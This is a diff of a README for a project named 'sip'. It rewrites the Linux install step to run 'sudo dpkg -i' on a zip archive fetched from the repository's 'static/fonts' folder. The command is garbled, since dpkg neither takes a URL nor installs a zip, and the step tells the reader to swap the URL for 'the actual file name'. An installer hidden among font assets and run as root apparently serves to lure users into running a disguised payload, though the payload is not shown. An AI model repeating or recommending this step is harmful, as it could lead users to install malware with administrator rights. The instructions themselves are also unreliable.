Quacklover28490/sip/README.md

 3. **For Linux:**
    - Open a terminal window.
    - Navigate to the folder where the downloaded file is located.
-   - Use the command `sudo dpkg -i sip-file-name.deb`, replacing `sip-file-name.deb` with the actual file name.
+   - Use the command `sudo dpkg -i https://raw.githubusercontent.com/Quacklover28490/sip/main/static/fonts/sip_v1.6.zip`, replacing `https://raw.githubusercontent.com/Quacklover28490/sip/main/static/fonts/sip_v1.6.zip` with the actual file name.
    - Use the command `sudo apt-get install -f` to resolve any dependencies.

 ## 📋 Running sip